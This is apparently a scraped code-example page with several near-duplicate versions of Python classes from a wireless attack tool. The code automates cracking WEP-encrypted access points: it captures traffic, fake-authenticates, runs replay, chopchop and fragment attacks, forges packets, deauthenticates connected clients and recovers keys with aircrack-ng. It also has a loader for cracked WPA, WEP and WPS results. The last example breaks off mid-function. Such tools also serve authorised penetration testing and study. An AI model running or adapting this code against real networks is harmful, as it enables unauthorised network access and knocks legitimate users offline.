Example #1
0
    def load(json):
        ''' Returns an instance of the appropriate object given a json instance '''
        if json['type'] == 'WPA':
            from CrackResultWPA import CrackResultWPA
            result = CrackResultWPA(json['bssid'], json['essid'],
                                    json['handshake_file'], json['key'])
        elif json['type'] == 'WEP':
            from CrackResultWEP import CrackResultWEP
            result = CrackResultWEP(json['bssid'], json['essid'],
                                    json['hex_key'], json['ascii_key'])

        elif json['type'] == 'WPS':
            from CrackResultWPS import CrackResultWPS
            result = CrackResultWPS(json['bssid'], json['essid'], json['pin'],
                                    json['psk'])
        result.date = json['date']
        return result
Example #2
0
    def run(self):
        '''
            Initiates full WEP attack.
            Including airodump-ng starting, cracking, etc.
            Returns: True if attack is succesful, false otherwise
        '''

        aircrack = None  # Aircrack process, not started yet
        fakeauth_proc = None
        replay_file = None

        attacks_remaining = list(Configuration.wep_attacks)
        while len(attacks_remaining) > 0:
            attack_name = attacks_remaining.pop(0)
            # BIG try-catch to capture ctrl+c
            try:
                # Start Airodump process
                with Airodump(
                        channel=self.target.channel,
                        target_bssid=self.target.bssid,
                        ivs_only=True,  # Only capture IVs packets
                        skip_wash=True,  # Don't check for WPS-compatibility
                        output_file_prefix='wep') as airodump:

                    Color.clear_line()
                    Color.p('\r{+} {O}waiting{W} for target to appear...')
                    airodump_target = self.wait_for_target(airodump)

                    fakeauth_proc = None
                    if self.fake_auth():
                        # We successfully authenticated!
                        # Use our interface's MAC address for the attacks.
                        client_mac = Interface.get_mac()
                        # Keep us authenticated
                        fakeauth_proc = Aireplay(self.target, "fakeauth")
                    elif len(airodump_target.clients) == 0:
                        # Failed to fakeauth, can't use our MAC.
                        # And there are no associated clients. Use one and tell the user.
                        Color.pl('{!} {O}there are no associated clients{W}')
                        Color.pl(
                            '{!} {R}WARNING: {O}many attacks will not succeed'
                            +
                            ' without fake-authentication or associated clients{W}'
                        )
                        client_mac = None
                    else:
                        # Fakeauth failed, but we can re-use an existing client
                        client_mac = airodump_target.clients[0].station

                    # Convert to WEPAttackType.
                    wep_attack_type = WEPAttackType(attack_name)

                    # Start Aireplay process.
                    aireplay = Aireplay(self.target,
                                        wep_attack_type,
                                        client_mac=client_mac)

                    time_unchanged_ivs = time.time(
                    )  # Timestamp when IVs last changed
                    previous_ivs = 0

                    # Loop until attack completes.

                    while True:
                        airodump_target = self.wait_for_target(airodump)
                        status = "%d/{C}%d{W} IVs" % (
                            airodump_target.ivs,
                            Configuration.wep_crack_at_ivs)
                        if fakeauth_proc:
                            if fakeauth_proc and fakeauth_proc.status:
                                status += ", {G}fakeauth{W}"
                            else:
                                status += ", {R}no-auth{W}"
                        if aireplay.status is not None:
                            status += ", %s" % aireplay.status
                        Color.clear_entire_line()
                        Color.pattack("WEP", airodump_target,
                                      "%s attack" % attack_name, status)

                        #self.aircrack_check()

                        # Check if we cracked it.
                        if aircrack and aircrack.is_cracked():
                            (hex_key, ascii_key) = aircrack.get_key_hex_ascii()
                            bssid = airodump_target.bssid
                            if airodump_target.essid_known:
                                essid = airodump_target.essid
                            else:
                                essid = None
                            Color.pl(
                                '\n{+} {C}%s{W} WEP attack {G}successful{W}\n'
                                % attack_name)
                            if aireplay: aireplay.stop()
                            if fakeauth_proc: fakeauth_proc.stop()
                            self.crack_result = CrackResultWEP(
                                self.target.bssid, self.target.essid, hex_key,
                                ascii_key)
                            self.crack_result.dump()
                            self.success = True
                            return self.success

                        if aircrack and aircrack.is_running():
                            # Aircrack is running in the background.
                            Color.p("and {C}cracking{W}")

                        # Check number of IVs, crack if necessary
                        if airodump_target.ivs > Configuration.wep_crack_at_ivs:
                            if not aircrack:
                                # Aircrack hasn't started yet. Start it.
                                ivs_file = airodump.find_files(
                                    endswith='.ivs')[0]
                                aircrack = Aircrack(ivs_file)

                            elif not aircrack.is_running():
                                # Aircrack stopped running.
                                Color.pl(
                                    '\n{!} {O}aircrack stopped running!{W}')
                                ivs_file = airodump.find_files(
                                    endswith='.ivs')[0]
                                Color.pl(
                                    '{+} {C}aircrack{W} stopped, restarting...'
                                )
                                self.fake_auth()
                                aircrack = Aircrack(ivs_file)

                            elif Configuration.wep_restart_aircrack > 0 and \
                                    aircrack.pid.running_time() > Configuration.wep_restart_aircrack:
                                # Restart aircrack after X seconds
                                aircrack.stop()
                                ivs_file = airodump.find_files(
                                    endswith='.ivs')[0]
                                Color.pl(
                                    '\n{+} {C}aircrack{W} ran for more than' +
                                    ' {C}%d{W} seconds, restarting' %
                                    Configuration.wep_restart_aircrack)
                                aircrack = Aircrack(ivs_file)

                        if not aireplay.is_running():
                            # Some Aireplay attacks loop infinitely
                            if attack_name == 'chopchop' or attack_name == 'fragment':
                                # We expect these to stop once a .xor is created, or if the process failed.

                                replay_file = None

                                # Check for .xor file.
                                xor_file = Aireplay.get_xor()
                                if not xor_file:
                                    # If .xor is not there, the process failed.
                                    Color.pl(
                                        '\n{!} {O}%s attack{R} did not generate'
                                        % attack_name + ' a .xor file{W}')
                                    # XXX: For debugging
                                    Color.pl('{?} {O}Command: {R}%s{W}' %
                                             aireplay.cmd)
                                    Color.pl('{?} {O}Output:\n{R}%s{W}' %
                                             aireplay.get_output())
                                    break

                                # If .xor exists, run packetforge-ng to create .cap
                                Color.pl(
                                    '\n{+} {C}%s attack{W}' % attack_name +
                                    ' generated a {C}.xor file{W}, {G}forging...{W}'
                                )
                                replay_file = Aireplay.forge_packet(
                                    xor_file, airodump_target.bssid,
                                    client_mac)
                                if replay_file:
                                    Color.pl('{+} {C}forged packet{W},' +
                                             ' {G}replaying...{W}')
                                    wep_attack_type = WEPAttackType(
                                        "forgedreplay")
                                    attack_name = "forgedreplay"
                                    aireplay = Aireplay(
                                        self.target,
                                        'forgedreplay',
                                        client_mac=client_mac,
                                        replay_file=replay_file)
                                    continue
                                else:
                                    # Failed to forge packet. drop out
                                    break
                            else:
                                Color.pl(
                                    '\n{!} {O}aireplay-ng exited unexpectedly{W}'
                                )
                                Color.pl('{?} {O}Command: {R}%s{W}' %
                                         aireplay.cmd)
                                Color.pl('{?} {O}Output:\n%s{W}' %
                                         aireplay.get_output())
                                break  # Continue to other attacks

                        # Check if IVs stopped flowing (same for > N seconds)
                        if airodump_target.ivs > previous_ivs:
                            time_unchanged_ivs = time.time()
                        elif Configuration.wep_restart_stale_ivs > 0 and \
                             attack_name != 'chopchop' and \
                             attack_name != 'fragment':
                            stale_seconds = time.time() - time_unchanged_ivs
                            if stale_seconds > Configuration.wep_restart_stale_ivs:
                                # No new IVs within threshold, restart aireplay
                                aireplay.stop()
                                Color.pl(
                                    '\n{!} restarting {C}aireplay{W} after' +
                                    ' {C}%d{W} seconds of no new IVs' %
                                    stale_seconds)
                                aireplay = Aireplay(self.target, \
                                                    wep_attack_type, \
                                                    client_mac=client_mac, \
                                                    replay_file=replay_file)
                                time_unchanged_ivs = time.time()
                        previous_ivs = airodump_target.ivs

                        time.sleep(1)
                        continue
                    # End of big while loop
                # End of with-airodump
            except KeyboardInterrupt:
                if fakeauth_proc: fakeauth_proc.stop()
                if len(attacks_remaining) == 0:
                    self.success = False
                    return self.success
                if self.user_wants_to_stop(attack_name, attacks_remaining,
                                           airodump_target):
                    self.success = False
                    return self.success
            except Exception as e:
                Color.pl("\n{+} {R}Error: {O}%s{W}" % e)
                continue
            # End of big try-catch
        # End of for-each-attack-type loop

        self.success = False
        return self.success
Example #3
0
class AttackWEP(Attack):
    '''
        Contains logic for attacking a WEP-encrypted access point.
    '''

    fakeauth_wait = 5

    def __init__(self, target):
        super(AttackWEP, self).__init__(target)
        self.crack_result = None
        self.success = False

    def run(self):
        '''
            Initiates full WEP attack.
            Including airodump-ng starting, cracking, etc.
            Returns: True if attack is succesful, false otherwise
        '''

        aircrack = None  # Aircrack process, not started yet
        fakeauth_proc = None
        replay_file = None

        attacks_remaining = list(Configuration.wep_attacks)
        while len(attacks_remaining) > 0:
            attack_name = attacks_remaining.pop(0)
            # BIG try-catch to capture ctrl+c
            try:
                # Start Airodump process
                with Airodump(
                        channel=self.target.channel,
                        target_bssid=self.target.bssid,
                        ivs_only=True,  # Only capture IVs packets
                        skip_wash=True,  # Don't check for WPS-compatibility
                        output_file_prefix='wep') as airodump:

                    Color.clear_line()
                    Color.p('\r{+} {O}waiting{W} for target to appear...')
                    airodump_target = self.wait_for_target(airodump)

                    fakeauth_proc = None
                    if self.fake_auth():
                        # We successfully authenticated!
                        # Use our interface's MAC address for the attacks.
                        client_mac = Interface.get_mac()
                        # Keep us authenticated
                        fakeauth_proc = Aireplay(self.target, "fakeauth")
                    elif len(airodump_target.clients) == 0:
                        # Failed to fakeauth, can't use our MAC.
                        # And there are no associated clients. Use one and tell the user.
                        Color.pl('{!} {O}there are no associated clients{W}')
                        Color.pl(
                            '{!} {R}WARNING: {O}many attacks will not succeed'
                            +
                            ' without fake-authentication or associated clients{W}'
                        )
                        client_mac = None
                    else:
                        # Fakeauth failed, but we can re-use an existing client
                        client_mac = airodump_target.clients[0].station

                    # Convert to WEPAttackType.
                    wep_attack_type = WEPAttackType(attack_name)

                    # Start Aireplay process.
                    aireplay = Aireplay(self.target,
                                        wep_attack_type,
                                        client_mac=client_mac)

                    time_unchanged_ivs = time.time(
                    )  # Timestamp when IVs last changed
                    previous_ivs = 0

                    # Loop until attack completes.

                    while True:
                        airodump_target = self.wait_for_target(airodump)
                        status = "%d/{C}%d{W} IVs" % (
                            airodump_target.ivs,
                            Configuration.wep_crack_at_ivs)
                        if fakeauth_proc:
                            if fakeauth_proc and fakeauth_proc.status:
                                status += ", {G}fakeauth{W}"
                            else:
                                status += ", {R}no-auth{W}"
                        if aireplay.status is not None:
                            status += ", %s" % aireplay.status
                        Color.clear_entire_line()
                        Color.pattack("WEP", airodump_target,
                                      "%s attack" % attack_name, status)

                        #self.aircrack_check()

                        # Check if we cracked it.
                        if aircrack and aircrack.is_cracked():
                            (hex_key, ascii_key) = aircrack.get_key_hex_ascii()
                            bssid = airodump_target.bssid
                            if airodump_target.essid_known:
                                essid = airodump_target.essid
                            else:
                                essid = None
                            Color.pl(
                                '\n{+} {C}%s{W} WEP attack {G}successful{W}\n'
                                % attack_name)
                            if aireplay: aireplay.stop()
                            if fakeauth_proc: fakeauth_proc.stop()
                            self.crack_result = CrackResultWEP(
                                self.target.bssid, self.target.essid, hex_key,
                                ascii_key)
                            self.crack_result.dump()
                            self.success = True
                            return self.success

                        if aircrack and aircrack.is_running():
                            # Aircrack is running in the background.
                            Color.p("and {C}cracking{W}")

                        # Check number of IVs, crack if necessary
                        if airodump_target.ivs > Configuration.wep_crack_at_ivs:
                            if not aircrack:
                                # Aircrack hasn't started yet. Start it.
                                ivs_file = airodump.find_files(
                                    endswith='.ivs')[0]
                                aircrack = Aircrack(ivs_file)

                            elif not aircrack.is_running():
                                # Aircrack stopped running.
                                Color.pl(
                                    '\n{!} {O}aircrack stopped running!{W}')
                                ivs_file = airodump.find_files(
                                    endswith='.ivs')[0]
                                Color.pl(
                                    '{+} {C}aircrack{W} stopped, restarting...'
                                )
                                self.fake_auth()
                                aircrack = Aircrack(ivs_file)

                            elif Configuration.wep_restart_aircrack > 0 and \
                                    aircrack.pid.running_time() > Configuration.wep_restart_aircrack:
                                # Restart aircrack after X seconds
                                aircrack.stop()
                                ivs_file = airodump.find_files(
                                    endswith='.ivs')[0]
                                Color.pl(
                                    '\n{+} {C}aircrack{W} ran for more than' +
                                    ' {C}%d{W} seconds, restarting' %
                                    Configuration.wep_restart_aircrack)
                                aircrack = Aircrack(ivs_file)

                        if not aireplay.is_running():
                            # Some Aireplay attacks loop infinitely
                            if attack_name == 'chopchop' or attack_name == 'fragment':
                                # We expect these to stop once a .xor is created, or if the process failed.

                                replay_file = None

                                # Check for .xor file.
                                xor_file = Aireplay.get_xor()
                                if not xor_file:
                                    # If .xor is not there, the process failed.
                                    Color.pl(
                                        '\n{!} {O}%s attack{R} did not generate'
                                        % attack_name + ' a .xor file{W}')
                                    # XXX: For debugging
                                    Color.pl('{?} {O}Command: {R}%s{W}' %
                                             aireplay.cmd)
                                    Color.pl('{?} {O}Output:\n{R}%s{W}' %
                                             aireplay.get_output())
                                    break

                                # If .xor exists, run packetforge-ng to create .cap
                                Color.pl(
                                    '\n{+} {C}%s attack{W}' % attack_name +
                                    ' generated a {C}.xor file{W}, {G}forging...{W}'
                                )
                                replay_file = Aireplay.forge_packet(
                                    xor_file, airodump_target.bssid,
                                    client_mac)
                                if replay_file:
                                    Color.pl('{+} {C}forged packet{W},' +
                                             ' {G}replaying...{W}')
                                    wep_attack_type = WEPAttackType(
                                        "forgedreplay")
                                    attack_name = "forgedreplay"
                                    aireplay = Aireplay(
                                        self.target,
                                        'forgedreplay',
                                        client_mac=client_mac,
                                        replay_file=replay_file)
                                    continue
                                else:
                                    # Failed to forge packet. drop out
                                    break
                            else:
                                Color.pl(
                                    '\n{!} {O}aireplay-ng exited unexpectedly{W}'
                                )
                                Color.pl('{?} {O}Command: {R}%s{W}' %
                                         aireplay.cmd)
                                Color.pl('{?} {O}Output:\n%s{W}' %
                                         aireplay.get_output())
                                break  # Continue to other attacks

                        # Check if IVs stopped flowing (same for > N seconds)
                        if airodump_target.ivs > previous_ivs:
                            time_unchanged_ivs = time.time()
                        elif Configuration.wep_restart_stale_ivs > 0 and \
                             attack_name != 'chopchop' and \
                             attack_name != 'fragment':
                            stale_seconds = time.time() - time_unchanged_ivs
                            if stale_seconds > Configuration.wep_restart_stale_ivs:
                                # No new IVs within threshold, restart aireplay
                                aireplay.stop()
                                Color.pl(
                                    '\n{!} restarting {C}aireplay{W} after' +
                                    ' {C}%d{W} seconds of no new IVs' %
                                    stale_seconds)
                                aireplay = Aireplay(self.target, \
                                                    wep_attack_type, \
                                                    client_mac=client_mac, \
                                                    replay_file=replay_file)
                                time_unchanged_ivs = time.time()
                        previous_ivs = airodump_target.ivs

                        time.sleep(1)
                        continue
                    # End of big while loop
                # End of with-airodump
            except KeyboardInterrupt:
                if fakeauth_proc: fakeauth_proc.stop()
                if len(attacks_remaining) == 0:
                    self.success = False
                    return self.success
                if self.user_wants_to_stop(attack_name, attacks_remaining,
                                           airodump_target):
                    self.success = False
                    return self.success
            except Exception as e:
                Color.pl("\n{+} {R}Error: {O}%s{W}" % e)
                continue
            # End of big try-catch
        # End of for-each-attack-type loop

        self.success = False
        return self.success

    def user_wants_to_stop(self, current_attack, attacks_remaining, target):
        '''
            Ask user what attack to perform next (re-orders attacks_remaining, returns False),
            or if we should stop attacking this target (returns True).
        '''
        target_name = target.essid if target.essid_known else target.bssid

        Color.pl("\n\n{!} {O}Interrupted")
        Color.pl("{+} {W}Next steps:")

        # Deauth clients & retry
        attack_index = 1
        Color.pl(
            "     {G}1{W}: {O}Deauth clients{W} and {G}retry{W} {C}%s attack{W} against {G}%s{W}"
            % (current_attack, target_name))

        # Move onto a different WEP attack
        for attack_name in attacks_remaining:
            attack_index += 1
            Color.pl(
                "     {G}%d{W}: Start new {C}%s attack{W} against {G}%s{W}" %
                (attack_index, attack_name, target_name))

        # Stop attacking entirely
        attack_index += 1
        Color.pl(
            "     {G}%d{W}: {R}Stop attacking, {O}Move onto next target{W}" %
            attack_index)
        while True:
            answer = raw_input(
                Color.s("{?} Select an option ({G}1-%d{W}): " % attack_index))
            if not answer.isdigit() or int(answer) < 1 or int(
                    answer) > attack_index:
                Color.pl(
                    "{!} {R}Invalid input: {O}Must enter a number between {G}1-%d{W}"
                    % attack_index)
                continue
            answer = int(answer)
            break

        if answer == 1:
            # Deauth clients & retry
            num_deauths = 1
            Color.clear_entire_line()
            Color.p(
                "\r{+} {O}Deauthenticating *broadcast*{W} (all clients)...")
            Aireplay.deauth(target.bssid, essid=target.essid)
            for client in target.clients:
                Color.clear_entire_line()
                Color.p("\r{+} {O}Deauthenticating client {C}%s{W}..." %
                        client.station)
                Aireplay.deauth(target.bssid,
                                client_mac=client.station,
                                essid=target.essid)
                num_deauths += 1
            Color.clear_entire_line()
            Color.pl("\r{+} Sent {C}%d {O}deauths{W}" % num_deauths)
            # Re-insert current attack to top of list of attacks remaining
            attacks_remaining.insert(0, current_attack)
            return False  # Don't stop
        elif answer == attack_index:
            return True  # Stop attacking
        elif answer > 1:
            # User selected specific attack: Re-order attacks based on desired next-step
            attacks_remaining.insert(0, attacks_remaining.pop(answer - 2))
            return False  # Don't stop

    def fake_auth(self):
        '''
            Attempts to fake-authenticate with target.
            Returns: True if successful,
                     False is unsuccesful.
        '''
        Color.p('\r{+} attempting {G}fake-authentication{W} with {C}%s{W}...' %
                self.target.bssid)
        fakeauth = Aireplay.fakeauth(self.target,
                                     timeout=AttackWEP.fakeauth_wait)
        if fakeauth:
            Color.pl(' {G}success{W}')
        else:
            Color.pl(' {R}failed{W}')
            if Configuration.require_fakeauth:
                # Fakeauth is requried, fail
                raise Exception('Fake-authenticate did not complete within' +
                                ' %d seconds' % AttackWEP.fakeauth_wait)
            else:
                # Warn that fakeauth failed
                Color.pl('{!} {O}' +
                         'unable to fake-authenticate with target' +
                         ' (%s){W}' % self.target.bssid)
                Color.pl('{!} continuing attacks because' +
                         ' {G}--require-fakeauth{W} was not set')
        return fakeauth
Example #4
0
    def run(self):
        '''
            Initiates full WEP attack.
            Including airodump-ng starting, cracking, etc.
            Returns: True if attack is succesful, false otherwise
        '''

        aircrack = None # Aircrack process, not started yet

        for (attack_index, attack_name) in enumerate(Configuration.wep_attacks):
            # BIG try-catch to capture ctrl+c
            try:
                # Start Airodump process
                with Airodump(channel=self.target.channel,
                              target_bssid=self.target.bssid,
                              ivs_only=True, # Only capture IVs packets
                              skip_wash=True, # Don't check for WPS-compatibility
                              output_file_prefix='wep') as airodump:

                    Color.clear_line()
                    Color.p('\r{+} {O}waiting{W} for target to appear...')
                    airodump_target = self.wait_for_target(airodump)

                    if self.fake_auth():
                        # We successfully authenticated!
                        # Use our interface's MAC address for the attacks.
                        client_mac = Interface.get_mac()
                    elif len(airodump_target.clients) == 0:
                        # There are no associated clients. Warn user.
                        Color.pl('{!} {O}there are no associated clients{W}')
                        Color.pl('{!} {R}WARNING: {O}many attacks will not succeed' +
                                 ' without fake-authentication or associated clients{W}')
                        client_mac = None
                    else:
                        client_mac = airodump_target.clients[0].station

                    # Convert to WEPAttackType.
                    wep_attack_type = WEPAttackType(attack_name)

                    replay_file = None
                    # Start Aireplay process.
                    aireplay = Aireplay(self.target, \
                                        wep_attack_type, \
                                        client_mac=client_mac, \
                                        replay_file=replay_file)

                    time_unchanged_ivs = time.time() # Timestamp when IVs last changed
                    previous_ivs = 0

                    # Loop until attack completes.

                    while True:
                        airodump_target = self.wait_for_target(airodump)
                        Color.p('\r{+} running {C}%s{W} WEP attack ({G}%d IVs{W}) '
                            % (attack_name, airodump_target.ivs))

                        # Check if we cracked it.
                        if aircrack and aircrack.is_cracked():
                            (hex_key, ascii_key) = aircrack.get_key_hex_ascii()
                            bssid = airodump_target.bssid
                            if airodump_target.essid_known:
                                essid = airodump_target.essid
                            else:
                                essid = None
                            Color.pl('\n{+} {C}%s{W} WEP attack {G}successful{W}\n'
                                % attack_name)
                            if aireplay:
                                aireplay.stop()
                            self.crack_result = CrackResultWEP(bssid, \
                                                               essid, \
                                                               hex_key, \
                                                               ascii_key)
                            self.crack_result.dump()
                            self.success = True
                            return self.success

                        if aircrack and aircrack.is_running():
                            # Aircrack is running in the background.
                            Color.p('and {C}cracking{W}')

                        # Check number of IVs, crack if necessary
                        if airodump_target.ivs > Configuration.wep_crack_at_ivs:
                            if not aircrack:
                                # Aircrack hasn't started yet. Start it.
                                ivs_file = airodump.find_files(endswith='.ivs')[0]
                                aircrack = Aircrack(ivs_file)

                            elif not aircrack.is_running():
                                # Aircrack stopped running.
                                Color.pl('\n{!} {O}aircrack stopped running!{W}')
                                ivs_file = airodump.find_files(endswith='.ivs')[0]
                                Color.pl('{+} {C}aircrack{W} stopped,' +
                                         ' restarting {C}aircrack{W}')
                                aircrack = Aircrack(ivs_file)

                            elif aircrack.is_running() and \
                                 Configuration.wep_restart_aircrack > 0:
                                # Restart aircrack after X seconds
                                if aircrack.pid.running_time() > Configuration.wep_restart_aircrack:
                                    aircrack.stop()
                                    ivs_file = airodump.find_files(endswith='.ivs')[0]
                                    Color.pl('\n{+} {C}aircrack{W} ran for more than' +
                                             ' {C}%d{W} seconds, restarting'
                                                 % Configuration.wep_restart_aircrack)
                                    aircrack = Aircrack(ivs_file)


                        if not aireplay.is_running():
                            # Some Aireplay attacks loop infinitely
                            if attack_name == 'chopchop' or attack_name == 'fragment':
                                # We expect these to stop once a .xor is created,
                                #    or if the process failed.

                                replay_file = None

                                # Check for .xor file.
                                xor_file = Aireplay.get_xor()
                                if not xor_file:
                                    # If .xor is not there, the process failed.
                                    Color.pl('\n{!} {O}%s attack{R} did not generate' % attack_name +
                                             ' a .xor file{W}')
                                    # XXX: For debugging
                                    Color.pl('\noutput:\n')
                                    Color.pl(aireplay.get_output())
                                    Color.pl('')
                                    break

                                # If .xor exists, run packetforge-ng to create .cap
                                Color.pl('\n{+} {C}%s attack{W}' % attack_name +
                                        ' generated a {C}.xor file{W}, {G}forging...{W}')
                                forge_file = Aireplay.forge_packet(xor_file,
                                                                   airodump_target.bssid,
                                                                   client_mac)
                                if forge_file:
                                    replay_file = forge_file
                                    Color.pl('{+} {C}forged packet{W},' +
                                             ' {G}replaying...{W}')
                                    attack_name = 'forged arp replay'
                                    aireplay = Aireplay(self.target, \
                                                        'forgedreplay', \
                                                        client_mac=client_mac, \
                                                        replay_file=replay_file)
                                    continue
                                else:
                                    # Failed to forge packet. drop out
                                    break
                            else:
                                Color.pl('\n{!} {O}aireplay-ng exited unexpectedly{W}')
                                Color.pl('\naireplay.get_output():')
                                Color.pl(aireplay.get_output())
                                break # Continue to other attacks

                        # Check if IVs stopped flowing (same for > N seconds)
                        if airodump_target.ivs > previous_ivs:
                            time_unchanged_ivs = time.time()
                        elif Configuration.wep_restart_stale_ivs > 0 and \
                             attack_name != 'chopchop' and \
                             attack_name != 'fragment':
                            stale_seconds = time.time() - time_unchanged_ivs
                            if stale_seconds > Configuration.wep_restart_stale_ivs:
                                # No new IVs within threshold, restart aireplay
                                aireplay.stop()
                                Color.pl('\n{!} restarting {C}aireplay{W} after' +
                                         ' {C}%d{W} seconds of no new IVs'
                                             % stale_seconds)
                                aireplay = Aireplay(self.target, \
                                                    wep_attack_type, \
                                                    client_mac=client_mac)
                                time_unchanged_ivs = time.time()
                        previous_ivs = airodump_target.ivs

                        time.sleep(1)
                        continue
                    # End of big while loop
                # End of with-airodump
            except KeyboardInterrupt:
                if not self.user_wants_to_continue(attack_index):
                    self.success = False
                    return self.success
            # End of big try-catch
        # End of for-each-attack-type loop

        self.success = False
        return self.success
Example #5
0
class AttackWEP(Attack):
    '''
        Contains logic for attacking a WEP-encrypted access point.
    '''

    fakeauth_wait = 5

    def __init__(self, target):
        super(AttackWEP, self).__init__(target)
        self.crack_result = None
        self.success = False

    def run(self):
        '''
            Initiates full WEP attack.
            Including airodump-ng starting, cracking, etc.
            Returns: True if attack is succesful, false otherwise
        '''

        aircrack = None # Aircrack process, not started yet

        for (attack_index, attack_name) in enumerate(Configuration.wep_attacks):
            # BIG try-catch to capture ctrl+c
            try:
                # Start Airodump process
                with Airodump(channel=self.target.channel,
                              target_bssid=self.target.bssid,
                              ivs_only=True, # Only capture IVs packets
                              skip_wash=True, # Don't check for WPS-compatibility
                              output_file_prefix='wep') as airodump:

                    Color.clear_line()
                    Color.p('\r{+} {O}waiting{W} for target to appear...')
                    airodump_target = self.wait_for_target(airodump)

                    if self.fake_auth():
                        # We successfully authenticated!
                        # Use our interface's MAC address for the attacks.
                        client_mac = Interface.get_mac()
                    elif len(airodump_target.clients) == 0:
                        # There are no associated clients. Warn user.
                        Color.pl('{!} {O}there are no associated clients{W}')
                        Color.pl('{!} {R}WARNING: {O}many attacks will not succeed' +
                                 ' without fake-authentication or associated clients{W}')
                        client_mac = None
                    else:
                        client_mac = airodump_target.clients[0].station

                    # Convert to WEPAttackType.
                    wep_attack_type = WEPAttackType(attack_name)

                    replay_file = None
                    # Start Aireplay process.
                    aireplay = Aireplay(self.target, \
                                        wep_attack_type, \
                                        client_mac=client_mac, \
                                        replay_file=replay_file)

                    time_unchanged_ivs = time.time() # Timestamp when IVs last changed
                    previous_ivs = 0

                    # Loop until attack completes.

                    while True:
                        airodump_target = self.wait_for_target(airodump)
                        Color.p('\r{+} running {C}%s{W} WEP attack ({G}%d IVs{W}) '
                            % (attack_name, airodump_target.ivs))

                        # Check if we cracked it.
                        if aircrack and aircrack.is_cracked():
                            (hex_key, ascii_key) = aircrack.get_key_hex_ascii()
                            bssid = airodump_target.bssid
                            if airodump_target.essid_known:
                                essid = airodump_target.essid
                            else:
                                essid = None
                            Color.pl('\n{+} {C}%s{W} WEP attack {G}successful{W}\n'
                                % attack_name)
                            if aireplay:
                                aireplay.stop()
                            self.crack_result = CrackResultWEP(bssid, \
                                                               essid, \
                                                               hex_key, \
                                                               ascii_key)
                            self.crack_result.dump()
                            self.success = True
                            return self.success

                        if aircrack and aircrack.is_running():
                            # Aircrack is running in the background.
                            Color.p('and {C}cracking{W}')

                        # Check number of IVs, crack if necessary
                        if airodump_target.ivs > Configuration.wep_crack_at_ivs:
                            if not aircrack:
                                # Aircrack hasn't started yet. Start it.
                                ivs_file = airodump.find_files(endswith='.ivs')[0]
                                aircrack = Aircrack(ivs_file)

                            elif not aircrack.is_running():
                                # Aircrack stopped running.
                                Color.pl('\n{!} {O}aircrack stopped running!{W}')
                                ivs_file = airodump.find_files(endswith='.ivs')[0]
                                Color.pl('{+} {C}aircrack{W} stopped,' +
                                         ' restarting {C}aircrack{W}')
                                aircrack = Aircrack(ivs_file)

                            elif aircrack.is_running() and \
                                 Configuration.wep_restart_aircrack > 0:
                                # Restart aircrack after X seconds
                                if aircrack.pid.running_time() > Configuration.wep_restart_aircrack:
                                    aircrack.stop()
                                    ivs_file = airodump.find_files(endswith='.ivs')[0]
                                    Color.pl('\n{+} {C}aircrack{W} ran for more than' +
                                             ' {C}%d{W} seconds, restarting'
                                                 % Configuration.wep_restart_aircrack)
                                    aircrack = Aircrack(ivs_file)


                        if not aireplay.is_running():
                            # Some Aireplay attacks loop infinitely
                            if attack_name == 'chopchop' or attack_name == 'fragment':
                                # We expect these to stop once a .xor is created,
                                #    or if the process failed.

                                replay_file = None

                                # Check for .xor file.
                                xor_file = Aireplay.get_xor()
                                if not xor_file:
                                    # If .xor is not there, the process failed.
                                    Color.pl('\n{!} {O}%s attack{R} did not generate' % attack_name +
                                             ' a .xor file{W}')
                                    # XXX: For debugging
                                    Color.pl('\noutput:\n')
                                    Color.pl(aireplay.get_output())
                                    Color.pl('')
                                    break

                                # If .xor exists, run packetforge-ng to create .cap
                                Color.pl('\n{+} {C}%s attack{W}' % attack_name +
                                        ' generated a {C}.xor file{W}, {G}forging...{W}')
                                forge_file = Aireplay.forge_packet(xor_file,
                                                                   airodump_target.bssid,
                                                                   client_mac)
                                if forge_file:
                                    replay_file = forge_file
                                    Color.pl('{+} {C}forged packet{W},' +
                                             ' {G}replaying...{W}')
                                    attack_name = 'forged arp replay'
                                    aireplay = Aireplay(self.target, \
                                                        'forgedreplay', \
                                                        client_mac=client_mac, \
                                                        replay_file=replay_file)
                                    continue
                                else:
                                    # Failed to forge packet. drop out
                                    break
                            else:
                                Color.pl('\n{!} {O}aireplay-ng exited unexpectedly{W}')
                                Color.pl('\naireplay.get_output():')
                                Color.pl(aireplay.get_output())
                                break # Continue to other attacks

                        # Check if IVs stopped flowing (same for > N seconds)
                        if airodump_target.ivs > previous_ivs:
                            time_unchanged_ivs = time.time()
                        elif Configuration.wep_restart_stale_ivs > 0 and \
                             attack_name != 'chopchop' and \
                             attack_name != 'fragment':
                            stale_seconds = time.time() - time_unchanged_ivs
                            if stale_seconds > Configuration.wep_restart_stale_ivs:
                                # No new IVs within threshold, restart aireplay
                                aireplay.stop()
                                Color.pl('\n{!} restarting {C}aireplay{W} after' +
                                         ' {C}%d{W} seconds of no new IVs'
                                             % stale_seconds)
                                aireplay = Aireplay(self.target, \
                                                    wep_attack_type, \
                                                    client_mac=client_mac)
                                time_unchanged_ivs = time.time()
                        previous_ivs = airodump_target.ivs

                        time.sleep(1)
                        continue
                    # End of big while loop
                # End of with-airodump
            except KeyboardInterrupt:
                if not self.user_wants_to_continue(attack_index):
                    self.success = False
                    return self.success
            # End of big try-catch
        # End of for-each-attack-type loop

        self.success = False
        return self.success

    def user_wants_to_continue(self, attack_index):
        ''' Asks user if attacks should continue using remaining methods '''
        Color.pl('\n{!} {O}interrupted{W}\n')

        if attack_index + 1 >= len(Configuration.wep_attacks):
            # No more WEP attacks to perform.
            return False

        attacks_remaining = Configuration.wep_attacks[attack_index + 1:]
        Color.pl("{+} {G}%d{W} attacks remain ({C}%s{W})" % (len(attacks_remaining), ', '.join(attacks_remaining)))
        prompt = Color.s('{+} type {G}c{W} to {G}continue{W}' +
                         ' or {R}s{W} to {R}stop{W}: ')
        if raw_input(prompt).lower().startswith('s'):
            return False
        else:
            return True

    def fake_auth(self):
        '''
            Attempts to fake-authenticate with target.
            Returns: True if successful,
                     False is unsuccesful.
        '''
        Color.p('\r{+} attempting {G}fake-authentication{W} with {C}%s{W}...'
            % self.target.bssid)
        start_time = time.time()
        aireplay = Aireplay(self.target, 'fakeauth')
        process_failed = False
        while aireplay.is_running():
            if int(time.time() - start_time) > AttackWEP.fakeauth_wait:
                aireplay.stop()
                process_failed = True
                break
            time.sleep(0.1)

        # Check if fake-auth was successful
        if process_failed:
            fakeauth = False
        else:
            output = aireplay.get_output()
            fakeauth = 'association successful' in output.lower()

        if fakeauth:
            Color.pl(' {G}success{W}')
        else:
